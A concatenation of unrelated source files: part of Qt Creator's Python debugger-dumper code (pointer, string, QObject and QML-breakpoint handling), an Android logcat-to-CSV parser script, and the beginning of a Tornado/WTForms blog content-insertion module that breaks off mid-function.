self.putValue(data, "latin1", elided=elided)
def putDisplay(self, editFormat, value):
self.put('editformat="%s",' % editFormat)
self.put('editvalue="%s",' % value)
# This is shared by pointer and array formatting.
def tryPutSimpleFormattedPointer(self, value, typeName, innerTypeName, displayFormat, limit):
if displayFormat == AutomaticFormat:
if innerTypeName == "char":
# Use UTF-8 as default for char *.
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if innerTypeName == "wchar_t":
self.putType(typeName)
charSize = self.lookupType('wchar_t').sizeof
(elided, data) = self.encodeCArray(value, charSize, limit)
if charSize == 2:
self.putValue(data, "utf16", elided=elided)
else:
self.putValue(data, "ucs4", elided=elided)
return True
if displayFormat == Latin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
return True
if displayFormat == SeparateLatin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
self.putDisplay("latin1:separate", data)
return True
if displayFormat == Utf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if displayFormat == SeparateUtf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
self.putDisplay("utf8:separate", data)
return True
if displayFormat == Local8BitStringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "local8bit", elided=elided)
return True
if displayFormat == Utf16StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 2, limit)
self.putValue(data, "utf16", elided=elided)
return True
if displayFormat == Ucs4StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 4, limit)
self.putValue(data, "ucs4", elided=elided)
return True
return False
def putFormattedPointer(self, value):
#warn("POINTER: %s" % value)
if self.isNull(value):
#warn("NULL POINTER")
self.putType(value.type)
self.putValue("0x0")
self.putNumChild(0)
return
typeName = str(value.type)
(dereferencable, pointerValue) = self.pointerInfo(value)
self.putAddress(pointerValue)
self.putOriginalAddress(value)
if not dereferencable:
# Failure to dereference a pointer should at least
# show the value of a pointer.
self.putValue(self.cleanAddress(pointerValue))
self.putType(typeName)
self.putNumChild(0)
return
displayFormat = self.currentItemFormat(value.type)
innerType = value.type.target().unqualified()
innerTypeName = str(innerType)
if innerTypeName == "void":
#warn("VOID POINTER: %s" % displayFormat)
self.putType(typeName)
self.putValue(str(value))
self.putNumChild(0)
return
if displayFormat == RawFormat:
# Explicitly requested bald pointer.
self.putType(typeName)
self.putValue(self.hexencode(str(value)), "utf8:1:0")
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, '*'):
self.putItem(value.dereference())
return
limit = self.displayStringLimit
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat:
limit = 1000000
if self.tryPutSimpleFormattedPointer(value, typeName, innerTypeName, displayFormat, limit):
self.putNumChild(0)
return
if Array10Format <= displayFormat and displayFormat <= Array1000Format:
n = (10, 100, 1000, 10000)[displayFormat - Array10Format]
self.putType(typeName)
self.putItemCount(n)
self.putArrayData(value, n, innerType)
return
if self.isFunctionType(innerType):
# A function pointer.
val = str(value)
pos = val.find(" = ") # LLDB only, but...
if pos > 0:
val = val[pos + 3:]
self.putValue(val)
self.putType(innerTypeName)
self.putNumChild(0)
return
#warn("AUTODEREF: %s" % self.autoDerefPointers)
#warn("INAME: %s" % self.currentIName)
if self.autoDerefPointers or self.currentIName.endswith('.this'):
# Generic pointer type with AutomaticFormat.
# Never dereference char types.
if innerTypeName != "char" \
and innerTypeName != "signed char" \
and innerTypeName != "unsigned char" \
and innerTypeName != "wchar_t":
self.putType(innerTypeName)
savedCurrentChildType = self.currentChildType
self.currentChildType = self.stripClassTag(innerTypeName)
self.putItem(value.dereference())
self.currentChildType = savedCurrentChildType
self.putOriginalAddress(value)
return
#warn("GENERIC PLAIN POINTER: %s" % value.type)
#warn("ADDR PLAIN POINTER: 0x%x" % value.address)
self.putType(typeName)
self.putValue("0x%x" % self.pointerValue(value))
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, "*"):
self.putItem(value.dereference())
def putOriginalAddress(self, value):
if not value.address is None:
self.put('origaddr="0x%x",' % toInteger(value.address))
def putQObjectNameValue(self, value):
try:
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(value, offset=ptrSize)
if self.qtVersion() < 0x050000:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc..
# - int postedEvents;
# - QMetaObject *metaObject;
# Offset of objectName in QObjectPrivate: 5 pointer + 2 int
# - [QObjectData base]
# - QString objectName
objectName = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
else:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc...
# - int postedEvents;
# - QDynamicMetaObjectData *metaObject;
extra = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
if extra == 0:
return False
# Offset of objectName in ExtraData: 6 pointer
# - QVector<QObjectUserData *> userData; only #ifndef QT_NO_USERDATA
# - QList<QByteArray> propertyNames;
# - QList<QVariant> propertyValues;
# - QVector<int> runningTimers;
# - QList<QPointer<QObject> > eventFilters;
# - QString objectName
objectName = self.extractPointer(extra + 5 * ptrSize)
data, size, alloc = self.byteArrayDataHelper(objectName)
# Object names are short, and GDB can crash on to big chunks.
# Since this here is a convenience feature only, limit it.
if size <= 0 or size > 80:
return False
raw = self.readMemory(data, 2 * size)
self.putValue(raw, "utf16", 1)
return True
except:
# warn("NO QOBJECT: %s" % value.type)
pass
def extractStaticMetaObjectHelper(self, typeobj):
"""
Checks whether type has a Q_OBJECT macro.
Returns the staticMetaObject, or 0.
"""
if self.isSimpleType(typeobj):
return 0
typeName = str(typeobj)
isQObjectProper = typeName == self.qtNamespace() + "QObject"
if not isQObjectProper:
if self.directBaseClass(typeobj, 0) is None:
return 0
# No templates for now.
if typeName.find('<') >= 0:
return 0
result = self.findStaticMetaObject(typeName)
# We need to distinguish Q_OBJECT from Q_GADGET:
# a Q_OBJECT SMO has a non-null superdata (unless it's QObject itself),
# a Q_GADGET SMO has a null superdata (hopefully)
if result and not isQObjectProper:
superdata = self.extractPointer(result)
if toInteger(superdata) == 0:
# This looks like a Q_GADGET
return 0
return result
def extractStaticMetaObject(self, typeobj):
"""
Checks recursively whether a type derives from QObject.
"""
if not self.useFancy:
return 0
typeName = str(typeobj)
result = self.knownStaticMetaObjects.get(typeName, None)
if result is not None: # Is 0 or the static metaobject.
return result
try:
result = self.extractStaticMetaObjectHelper(typeobj)
except RuntimeError as error:
warn("METAOBJECT EXTRACTION FAILED: %s" % error)
result = 0
except:
warn("METAOBJECT EXTRACTION FAILED FOR UNKNOWN REASON")
result = 0
if not result:
base = self.directBaseClass(typeobj, 0)
if base:
result = self.extractStaticMetaObject(base)
self.knownStaticMetaObjects[typeName] = result
return result
def staticQObjectMetaData(self, metaobject, offset1, offset2, step):
items = []
dd = metaobject["d"]
data = self.extractPointer(dd["data"])
sd = self.extractPointer(dd["stringdata"])
metaObjectVersion = self.extractInt(data)
itemCount = self.extractInt(data + offset1)
itemData = -offset2 if offset2 < 0 else self.extractInt(data + offset2)
if metaObjectVersion >= 7: # Qt 5.
byteArrayDataType = self.lookupType(self.qtNamespace() + "QByteArrayData")
byteArrayDataSize = byteArrayDataType.sizeof
for i in range(itemCount):
x = data + (itemData + step * i) * 4
literal = sd + self.extractInt(x) * byteArrayDataSize
ldata, lsize, lalloc = self.byteArrayDataHelper(literal)
items.append(self.extractBlob(ldata, lsize).toString())
else: # Qt 4.
for i in range(itemCount):
x = data + (itemData + step * i) * 4
ldata = sd + self.extractInt(x)
items.append(self.extractCString(ldata).decode("utf8"))
return items
def staticQObjectPropertyCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 24)
def staticQObjectPropertyNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 24, 28, 3)
def staticQObjectMethodCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 16)
def staticQObjectMethodNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 16, 20, 5)
def staticQObjectSignalCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 52)
def staticQObjectSignalNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 52, -14, 5)
def extractCString(self, addr):
result = bytearray()
while True:
d = self.extractByte(addr)
if d == 0:
break
result.append(d)
addr += 1
return result
def listChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
begin = self.extractInt(base + 8)
end = self.extractInt(base + 12)
array = base + 16
if self.qtVersion() < 0x50000:
array += self.ptrSize()
size = end - begin
innerSize = innerType.sizeof
stepSize = self.ptrSize()
addr = array + begin * stepSize
isInternal = innerSize <= stepSize and self.isMovableType(innerType)
for i in range(size):
if isInternal:
yield self.createValue(addr + i * stepSize, innerType)
else:
p = self.extractPointer(addr + i * stepSize)
yield self.createValue(p, innerType)
def vectorChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
size = self.extractInt(base + 4)
data = base + self.extractPointer(base + 8 + self.ptrSize())
innerSize = innerType.sizeof
for i in range(size):
yield self.createValue(data + i * innerSize, innerType)
# This is called is when a QObject derived class is expanded
def putQObjectGuts(self, qobject, smo):
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(qobject, offset=ptrSize)
isQt5 = self.qtVersion() >= 0x50000
extraDataOffset = 5 * ptrSize + 8 if isQt5 else 6 * ptrSize + 8
extraData = self.extractPointer(dd + extraDataOffset)
#with SubItem(self, "[extradata]"):
# self.putValue("0x%x" % toInteger(extraData))
# Parent and children.
try:
d_ptr = qobject["d_ptr"]["d"]
self.putSubItem("[parent]", d_ptr["parent"])
self.putSubItem("[children]", d_ptr["children"])
except:
pass
with SubItem(self, "[properties]"):
propertyCount = 0
usesVector = self.qtVersion() >= 0x50700
if self.isExpanded():
propertyNames = self.staticQObjectPropertyNames(smo)
propertyCount = len(propertyNames) # Doesn't include dynamic properties.
with Children(self):
# Static properties.
for i in range(propertyCount):
name = propertyNames[i]
self.putCallItem(str(name), qobject, "property", '"' + name + '"')
# Dynamic properties.
if extraData:
byteArrayType = self.lookupQtType("QByteArray")
variantType = self.lookupQtType("QVariant")
names = self.listChildrenGenerator(extraData + ptrSize, byteArrayType)
if usesVector:
values = self.vectorChildrenGenerator(extraData + 2 * ptrSize, variantType)
else:
values = self.listChildrenGenerator(extraData + 2 * ptrSize, variantType)
for (k, v) in zip(names, values):
with SubItem(self, propertyCount):
self.put('key="%s",' % self.encodeByteArray(k))
self.put('keyencoded="latin1",')
self.putItem(v)
propertyCount += 1
self.putValue(str('<%s items>' % propertyCount if propertyCount else '<>0 items>'))
self.putNumChild(1)
with SubItem(self, "[methods]"):
methodCount = self.staticQObjectMethodCount(smo)
self.putItemCount(methodCount)
if self.isExpanded():
methodNames = self.staticQObjectMethodNames(smo)
with Children(self):
for i in range(methodCount):
k = methodNames[i]
with SubItem(self, k):
self.putEmptyValue()
with SubItem(self, "[signals]"):
signalCount = self.staticQObjectSignalCount(smo)
self.putItemCount(signalCount)
if self.isExpanded():
signalNames = self.staticQObjectSignalNames(smo)
signalCount = len(signalNames)
with Children(self):
for i in range(signalCount):
k = signalNames[i]
with SubItem(self, k):
self.putEmptyValue()
self.putQObjectConnections(qobject)
def putQObjectConnections(self, qobject):
with SubItem(self, "[connections]"):
ptrSize = self.ptrSize()
self.putNoType()
ns = self.qtNamespace()
privateTypeName = ns + "QObjectPrivate"
privateType = self.lookupType(privateTypeName)
dd = qobject["d_ptr"]["d"]
d_ptr = dd.cast(privateType.pointer()).dereference()
connections = d_ptr["connectionLists"]
if self.isNull(connections):
self.putItemCount(0)
else:
connections = connections.dereference()
connections = connections.cast(self.directBaseClass(connections.type))
self.putSpecialValue("minimumitemcount", 0)
self.putNumChild(1)
if self.isExpanded():
pp = 0
with Children(self):
innerType = self.templateArgument(connections.type, 0)
# Should check: innerType == ns::QObjectPrivate::ConnectionList
base = self.extractPointer(connections)
data, size, alloc = self.vectorDataHelper(base)
connectionType = self.lookupType(ns + "QObjectPrivate::Connection")
for i in xrange(size):
first = self.extractPointer(data + i * 2 * ptrSize)
while first:
self.putSubItem("%s" % pp,
self.createPointerValue(first, connectionType))
first = self.extractPointer(first + 3 * ptrSize)
# We need to enforce some upper limit.
pp += 1
if pp > 1000:
break
def isKnownMovableType(self, typeName):
if typeName in (
"QBrush", "QBitArray", "QByteArray", "QCustomTypeInfo", "QChar", "QDate",
"QDateTime", "QFileInfo", "QFixed", "QFixedPoint", "QFixedSize",
"QHashDummyValue", "QIcon", "QImage", "QLine", "QLineF", "QLatin1Char",
"QLocale", "QMatrix", "QModelIndex", "QPoint", "QPointF", "QPen",
"QPersistentModelIndex", "QResourceRoot", "QRect", "QRectF", "QRegExp",
"QSize", "QSizeF", "QString", "QTime", "QTextBlock", "QUrl", "QVariant",
"QXmlStreamAttribute", "QXmlStreamNamespaceDeclaration",
"QXmlStreamNotationDeclaration", "QXmlStreamEntityDeclaration"
):
return True
return typeName == "QStringList" and self.qtVersion() >= 0x050000
def currentItemFormat(self, type = None):
displayFormat = self.formats.get(self.currentIName, AutomaticFormat)
if displayFormat == AutomaticFormat:
if type is None:
type = self.currentType.value
needle = self.stripForFormat(str(type))
displayFormat = self.typeformats.get(needle, AutomaticFormat)
return displayFormat
def putArrayData(self, base, n, innerType,
childNumChild = None, maxNumChild = 10000):
addrBase = toInteger(base)
innerSize = innerType.sizeof
enc = self.simpleEncoding(innerType)
if enc:
self.put('childtype="%s",' % innerType)
self.put('addrbase="0x%x",' % addrBase)
self.put('addrstep="0x%x",' % innerSize)
self.put('arrayencoding="%s",' % enc)
if n > maxNumChild:
self.put('childrenelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
self.put('arraydata="')
self.put(self.readMemory(addrBase, n * innerSize))
self.put('",')
else:
with Children(self, n, innerType, childNumChild, maxNumChild,
addrBase=addrBase, addrStep=innerSize):
for i in self.childRange():
self.putSubItem(i, self.createValue(addrBase + i * innerSize, innerType))
def putArrayItem(self, name, addr, n, typeName):
with SubItem(self, name):
self.putEmptyValue()
self.putType("%s [%d]" % (typeName, n))
self.putArrayData(addr, n, self.lookupType(typeName))
self.putAddress(addr)
def putPlotDataHelper(self, base, n, innerType, maxNumChild = 1000*1000):
if n > maxNumChild:
self.put('plotelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
if self.currentItemFormat() == ArrayPlotFormat and self.isSimpleType(innerType):
enc = self.simpleEncoding(innerType)
if enc:
self.putField("editencoding", enc)
self.putDisplay("plotdata:separate",
self.readMemory(base, n * innerType.sizeof))
def putPlotData(self, base, n, innerType, maxNumChild = 1000*1000):
self.putPlotDataHelper(base, n, innerType, maxNumChild=maxNumChild)
if self.isExpanded():
self.putArrayData(base, n, innerType, maxNumChild=maxNumChild)
def putSpecialArgv(self, value):
"""
Special handling for char** argv.
"""
n = 0
p = value
# p is 0 for "optimized out" cases. Or contains rubbish.
try:
if not self.isNull(p):
while not self.isNull(p.dereference()) and n <= 100:
p += 1
n += 1
except:
pass
with TopLevelItem(self, 'local.argv'):
self.put('iname="local.argv",name="argv",')
self.putItemCount(n, 100)
self.putType('char **')
if self.currentIName in self.expandedINames:
p = value
with Children(self, n):
for i in xrange(n):
self.putSubItem(i, p.dereference())
p += 1
def extractPointer(self, thing, offset = 0):
if isinstance(thing, int):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif sys.version_info[0] == 2 and isinstance(thing, long):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif isinstance(thing, Blob):
rawBytes = thing.toBytes()
else:
# Assume it's a (backend specific) Value.
rawBytes = self.toBlob(thing).toBytes()
code = "I" if self.ptrSize() == 4 else "Q"
return struct.unpack_from(code, rawBytes, offset)[0]
# Parses a..b and a.(s).b
def parseRange(self, exp):
# Search for the first unbalanced delimiter in s
def searchUnbalanced(s, upwards):
paran = 0
bracket = 0
if upwards:
open_p, close_p, open_b, close_b = '(', ')', '[', ']'
else:
open_p, close_p, open_b, close_b = ')', '(', ']', '['
for i in range(len(s)):
c = s[i]
if c == open_p:
paran += 1
elif c == open_b:
bracket += 1
elif c == close_p:
paran -= 1
if paran < 0:
return i
elif c == close_b:
bracket -= 1
if bracket < 0:
return i
return len(s)
match = re.search("(\.)(\(.+?\))?(\.)", exp)
if match:
s = match.group(2)
left_e = match.start(1)
left_s = 1 + left_e - searchUnbalanced(exp[left_e::-1], False)
right_s = match.end(3)
right_e = right_s + searchUnbalanced(exp[right_s:], True)
template = exp[:left_s] + '%s' + exp[right_e:]
a = exp[left_s:left_e]
b = exp[right_s:right_e]
try:
# Allow integral expressions.
ss = toInteger(self.parseAndEvaluate(s[1:len(s)-1]) if s else 1)
aa = toInteger(self.parseAndEvaluate(a))
bb = toInteger(self.parseAndEvaluate(b))
if aa < bb and ss > 0:
return True, aa, ss, bb + 1, template
except:
pass
return False, 0, 1, 1, exp
def putNumChild(self, numchild):
if numchild != self.currentChildNumChild:
self.put('numchild="%s",' % numchild)
def handleWatches(self, args):
for watcher in args.get("watchers", []):
iname = watcher['iname']
exp = self.hexdecode(watcher['exp'])
self.handleWatch(exp, exp, iname)
def handleWatch(self, origexp, exp, iname):
exp = str(exp).strip()
escapedExp = self.hexencode(exp)
#warn("HANDLING WATCH %s -> %s, INAME: '%s'" % (origexp, exp, iname))
# Grouped items separated by semicolon
if exp.find(";") >= 0:
exps = exp.split(';')
n = len(exps)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
for i in xrange(n):
self.handleWatch(exps[i], exps[i], "%s.%d" % (iname, i))
return
# Special array index: e.g a[1..199] or a[1.(3).199] for stride 3.
isRange, begin, step, end, template = self.parseRange(exp)
if isRange:
#warn("RANGE: %s %s %s in %s" % (begin, step, end, template))
r = range(begin, end, step)
n = len(r)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
with Children(self, n):
for i in r:
e = template % i
self.handleWatch(e, e, "%s.%s" % (iname, i))
return
# Fall back to less special syntax
#return self.handleWatch(origexp, exp, iname)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
self.put('wname="%s",' % escapedExp)
try:
value = self.parseAndEvaluate(exp)
self.putItem(value)
except RuntimeError:
self.currentType.value = " "
self.currentValue.value = "<no such value>"
self.currentChildNumChild = -1
self.currentNumChild = 0
self.putNumChild(0)
def registerDumper(self, funcname, function):
try:
if funcname.startswith("qdump__"):
typename = funcname[7:]
spec = inspect.getargspec(function)
if len(spec.args) == 2:
self.qqDumpers[typename] = function
elif len(spec.args) == 3 and len(spec.defaults) == 1:
self.qqDumpersEx[spec.defaults[0]] = function
self.qqFormats[typename] = self.qqFormats.get(typename, [])
elif funcname.startswith("qform__"):
typename = funcname[7:]
try:
self.qqFormats[typename] = function()
except:
self.qqFormats[typename] = []
elif funcname.startswith("qedit__"):
typename = funcname[7:]
try:
self.qqEditable[typename] = function
except:
pass
except:
pass
def setupDumpers(self, _ = {}):
self.resetCaches()
for mod in self.dumpermodules:
m = __import__(mod)
dic = m.__dict__
for name in dic.keys():
item = dic[name]
self.registerDumper(name, item)
msg = "dumpers=["
for key, value in self.qqFormats.items():
editable = ',editable="true"' if key in self.qqEditable else ''
formats = (',formats=\"%s\"' % str(value)[1:-1]) if len(value) else ''
msg += '{type="%s"%s%s},' % (key, editable, formats)
msg += '],'
v = 10000 * sys.version_info[0] + 100 * sys.version_info[1] + sys.version_info[2]
msg += 'python="%d"' % v
return msg
def reloadDumpers(self, args):
for mod in self.dumpermodules:
m = sys.modules[mod]
if sys.version_info[0] >= 3:
import importlib
importlib.reload(m)
else:
reload(m)
self.setupDumpers(args)
def addDumperModule(self, args):
path = args['path']
(head, tail) = os.path.split(path)
sys.path.insert(1, head)
self.dumpermodules.append(os.path.splitext(tail)[0])
def extractQStringFromQDataStream(self, buf, offset):
""" Read a QString from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('utf-16be')
return (string, offset + size)
def extractQByteArrayFromQDataStream(self, buf, offset):
""" Read a QByteArray from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('latin1')
return (string, offset + size)
def extractIntFromQDataStream(self, buf, offset):
""" Read an int from the stream """
value = struct.unpack_from("!I", buf, offset)[0]
return (value, offset + 4)
def handleInterpreterMessage(self):
""" Return True if inferior stopped """
resdict = self.fetchInterpreterResult()
return resdict.get('event') == 'break'
def reportInterpreterResult(self, resdict, args):
print('interpreterresult=%s,token="%s"'
% (self.resultToMi(resdict), args.get('token', -1)))
def reportInterpreterAsync(self, resdict, asyncclass):
print('interpreterasync=%s,asyncclass="%s"'
% (self.resultToMi(resdict), asyncclass))
def removeInterpreterBreakpoint(self, args):
res = self.sendInterpreterRequest('removebreakpoint', { 'id' : args['id'] })
return res
def insertInterpreterBreakpoint(self, args):
args['condition'] = self.hexdecode(args.get('condition', ''))
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
resdict = args.copy()
bp = None if response is None else response.get("breakpoint", None)
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
self.createResolvePendingBreakpointsHookBreakpoint(args)
resdict['number'] = -1
resdict['pending'] = 1
resdict['warning'] = 'Direct interpreter breakpoint insertion failed.'
self.reportInterpreterResult(resdict, args)
def resolvePendingInterpreterBreakpoint(self, args):
self.parseAndEvaluate('qt_qmlDebugEnableService("NativeQmlDebugger")')
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
resdict = args.copy()
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
resdict['number'] = -1
resdict['pending'] = 0
resdict['error'] = 'Pending interpreter breakpoint insertion failed.'
self.reportInterpreterAsync(resdict, 'breakpointmodified')
def fetchInterpreterResult(self):
buf = self.parseAndEvaluate("qt_qmlDebugMessageBuffer")
size = self.parseAndEvaluate("qt_qmlDebugMessageLength")
msg = self.hexdecode(self.readMemory(buf, size))
# msg is a sequence of 'servicename<space>msglen<space>msg' items.
resdict = {} # Native payload.
while len(msg):
pos0 = msg.index(' ') # End of service name
pos1 = msg.index(' ', pos0 + 1) # End of message length
service = msg[0:pos0]
msglen = int(msg[pos0+1:pos1])
msgend = pos1+1+msglen
payload = msg[pos1+1:msgend]
msg = msg[msgend:]
if service == 'NativeQmlDebugger':
try:
resdict = json.loads(payload)
continue
except:
warn("Cannot parse native payload: %s" % payload)
else:
print('interpreteralien=%s'
% {'service': service, 'payload': self.hexencode(payload)})
try:
expr = 'qt_qmlDebugClearBuffer()'
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Cleaning buffer failed: %s: %s" % (expr, error))
return resdict
def sendInterpreterRequest(self, command, args = {}):
encoded = json.dumps({ 'command': command, 'arguments': args })
hexdata = self.hexencode(encoded)
expr = 'qt_qmlDebugSendDataToService("NativeQmlDebugger","%s")' % hexdata
try:
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
except AttributeError as error:
# Happens with LLDB and 'None' current thread.
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
if not res:
warn("Interpreter command failed: %s " % encoded)
return {}
return self.fetchInterpreterResult()
def executeStep(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepin', args)
self.doContinue()
def executeStepOut(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepout', args)
self.doContinue()
def executeNext(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepover', args)
self.doContinue()
def executeContinue(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('continue', args)
self.doContinue()
def doInsertInterpreterBreakpoint(self, args, wasPending):
#warn("DO INSERT INTERPRETER BREAKPOINT, WAS PENDING: %s" % wasPending)
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
if wasPending:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'error': 'Pending interpreter breakpoint insertion failed.'}, args)
return
else:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'warning': 'Direct interpreter breakpoint insertion failed.'}, args)
self.createResolvePendingBreakpointsHookBreakpoint(args)
return
self.reportInterpreterResult({'bpnr': bp, 'pending': 0}, args)
def isInternalInterpreterFrame(self, functionName):
if functionName is None:
return False
if functionName.startswith("qt_v4"):
return True
return functionName.startswith(self.qtNamespace() + "QV4::")
# Hack to avoid QDate* dumper timeouts with GDB 7.4 on 32 bit
# due to misaligned %ebx in SSE calls (qstring.cpp:findChar)
def canCallLocale(self):
return True
def isReportableInterpreterFrame(self, functionName):
return functionName and functionName.find("QV4::Moth::VME::exec") >= 0
def extractQmlData(self, value):
if value.type.code == PointerCode:
value = value.dereference()
data = value["data"]
return data.cast(self.lookupType(str(value.type).replace("QV4::", "QV4::Heap::")))
# Contains iname, name, and value.
class LocalItem:
pass
def extractInterpreterStack(self):
return self.sendInterpreterRequest('backtrace', {'limit': 10 })
|
gpl-3.0
| 2,995,124,426,568,365,000
| 36.45848
| 103
| 0.55573
| false
| 4.051494
| false
| false
| false
|
chapinb/shattered
|
libs/liblogcat.py
|
1
|
4282
|
#!/usr/bin/env python3
##################################################################################
## ##
## _____ _ _ _ _ ##
## | __| |_ ___| |_| |_ ___ ___ ___ _| | ##
## |__ | | .'| _| _| -_| _| -_| . | ##
## |_____|_|_|__,|_| |_| |___|_| |___|___| ##
## ##
## ##
## Special Thanks to Julie Desautels, Jon Rajewski, and the LCDI for the ##
## research leading to the success of this script. ##
## ##
## Copyright 2013, Chapin Bryce ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see <http://www.gnu.org/licenses/>. ##
## ##
##################################################################################
## Logcat Parser
"""
This module is designed to parse data within the logcat export from shattered.
Run as a standalone, the module will prompt for an input and output file.
The output format is in csv.
ie. $ python3 logcat_lib.py
"""
import re
import os
import sys
def logcat_version():
"""
Function for calling the version of the code
"""
version = 20140213
print("Logcat Parser version: ", version)
def logcat_parser(inputfile, outputfile):
"""
This function parses the data from a logcat input file into csv format for easier reading.
Can be run as standalone script (ie ./logcat_lib.py) or imported to another script.
"""
logcat_version()
print("Parsing Logcat File...")
fin = open(inputfile, 'r')
fout = open(outputfile, 'w')
fout.write("Date, Time, PID, Level, Tag, Data")
bucket = ""
logname = re.compile(r'----*')
metainfostart = re.compile(r'^\[ \d')
metainfoend = re.compile(r'\]$')
anytext = re.compile(r'.*')
for line in fin:
line = line.strip()
if logname.findall(line):
print("Processesing Log: " + line)
loginfo = "Processesing Log: " + line
elif metainfoend.findall(line) and metainfostart.findall(line):
meta = line
meta = logcat_meta(meta)
fout.write(meta)
elif anytext.findall(line):
data = line
data = data.strip()
data = data.replace(",", " ")
bucket = data
fout.write(bucket)
fout.flush()
fout.close()
print("####################\nLogcat Processing Complete\n####################")
def logcat_meta(meta):
"""
This function breaks down the meta data information to allow better sorting and
filtering in CSV interpreters
"""
meta_a = meta.split()
date = meta_a[1]
time = meta_a[2]
pid = meta_a[3]
service = meta_a[4]
service_a = service.split("/")
level = service_a[0]
tag = service_a[1]
meta_out = "\n" + date + "," + time + "," + pid + "," + level + "," + tag + ","
return meta_out
|
gpl-3.0
| 5,323,526,873,882,407,000
| 35.234783
| 94
| 0.429939
| false
| 4.378323
| false
| false
| false
|
zzir/white
|
update_content.py
|
1
|
3484
|
import sqlite3
from wtforms.fields import StringField, IntegerField
from wtforms import validators
from wtforms_tornado import Form
from config import CONFIG
from get_content import TContents
class CheckContents(Form):
title = StringField(validators=[validators.length(min=1, max=100)])
slug = StringField(validators=[
validators.length(min=1, max=50),
validators.regexp(r"^[A-Za-z0-9_-]*$")
])
tags = StringField(validators=[validators.length(min=1, max=150)])
column = StringField(validators=[validators.length(max=50)], default='')
text = StringField(validators=[validators.length(min=1)])
short = StringField(validators=[validators.length(max=512)], default='')
top = IntegerField(validators=[validators.AnyOf([0,1])], default=0)
feed = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
comment = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
status = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
original = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
def add_contents(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title = TContents().check_title(title)
same_slug = TContents().check_slug(slug)
if same_title != 'ok':
return "same Title!"
